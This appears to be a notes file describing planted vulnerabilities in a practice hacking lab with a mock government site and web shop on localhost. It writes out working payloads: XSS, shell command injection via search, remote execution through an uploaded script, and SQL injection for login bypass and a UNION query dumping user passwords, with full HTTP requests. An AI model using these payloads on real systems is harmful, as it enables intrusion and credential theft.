# Targets

#### Gov

Government of Banania.

* unsecure search displaying search string (xss) `Gov/?page=search.html&q=<b style="color:red">attack!</b>`
* search with grep returns command line output `Gov/?page=search.html&q=;ls -la`
* file upload so that it could be run from the url 
 * upload file `Gov/?page=contest.html`
 * needed POST fields
    * title
    * entry (any file)
    * name
    * email
* page content file specified in url `Gov/?page=uploads/attack.sh`




#### Shop

web shop

* login + register
 * unprotected password (no encryption)
 * unprotected cookies (session hijack)
 * unprotected input (sql injection)

```
POST /cyber0lympics/Targets/Shop/?page=login HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 49
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/cyber0lympics/Targets/Shop/?page=login
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,et;q=0.6,nb;q=0.4
Cookie: PHPSESSID=nolrdaqs38cohut14f7f2n6au1

username=test'+or+'1'='1
password=wrong
```

* basket + shop view
* shop search - return table of returned rows `SELECT id, name, description, stock, price FROM shop_items where name like '%{$search}%' or description like '%{$search}%' `

```
GET /cyber0lympics/Targets/Shop/?page=search&q=a%25%27+union+select+1%2C+username%2C+password%2C+email%2C+id+from+shop_users+%23+-- HTTP/1.1
Host: localhost
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36
Referer: http://localhost/cyber0lympics/Targets/Shop/?page=search&q=a%25%27+union+select+username%2C+password%2C+email%2C+id%2C+1+from+shop_users+%23+--
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,et;q=0.6,nb;q=0.4
Cookie: PHPSESSID=2j1ensg44c5783lusgb3k0ldm2

page=search
q=a%' union select 1, username, password, email, id from shop_users # --
```

* admin panel ?
 * manage items

